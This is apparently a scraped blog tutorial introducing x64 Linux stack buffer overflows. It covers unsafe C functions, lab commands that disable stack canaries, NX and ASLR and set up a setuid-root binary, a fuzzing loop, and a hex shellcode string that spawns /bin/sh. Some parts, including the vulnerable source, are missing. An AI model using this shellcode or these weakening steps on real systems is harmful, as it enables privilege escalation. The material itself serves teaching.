Introduction to x64 Linux Binary Exploitation (Part 1)

Basic Buffer Overflow (BoF)

JMP to PART2 || PART3 || PART4 || PART5

Tools

Basic concepts

“Sins of the father”

The C programming language has many “dangerous” functions that do not check bounds. These functions must be avoided, while in the unlikely event that they can’t, then the programmer must ensure that the bounds will never get exceeded. Some of these functions are the following:

strcpy, strcat, sprintf, vsprintf, gets

These should be replaced with functions such as strncpy, strncat, snprintf, and fgets respectively. The function strlen should be avoided unless you can ensure that there will be a terminating NIL character to find. The scanf family (scanf, fscanf, sscanf, vscanf, vsscanf, and vfscanf) is often dangerous to use [8].

https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64
https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64

The 128-byte area beyond the location pointed to by %rsp is considered to be reserved and shall not be modified by signal or interrupt handlers. Therefore, functions may use this area for temporary data that is not needed across function calls. In particular, leaf functions may use this area for their entire stack frame, rather than adjusting the stack pointer in the prologue and epilogue. This area is known as the red zone.

Under specific conditions it is possible to override the return address and control the program execution.

The overwritten address has to be canonical or else the it will be considered as invalid and the redirection will fail.

A vulnerable program

Disabling Canary, ASLR, NX, FORTIFY_SOURCE

$gcc -fno-stack-protector vuln.c -o vuln -z execstack -D_FORTIFY_SOURCE=0
$sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
#chown root vuln; chmod +s vuln 

Why this program is vulnerable ?

$ for i in {200..210}; do echo using $i bytes; python -c “print(‘A’ * $i)” > payload; ./vuln $(cat payload) > /dev/null; done;
gef> r $(cat payload)
\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05
$rip points to 0x434343434343 == CCCCCC address

Summary

--

--

https://www.linkedin.com/in/valsamaras/, developer of https://github.com/Ch0pin/medusa. Posts are solely my own and do not express the views of my employer.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store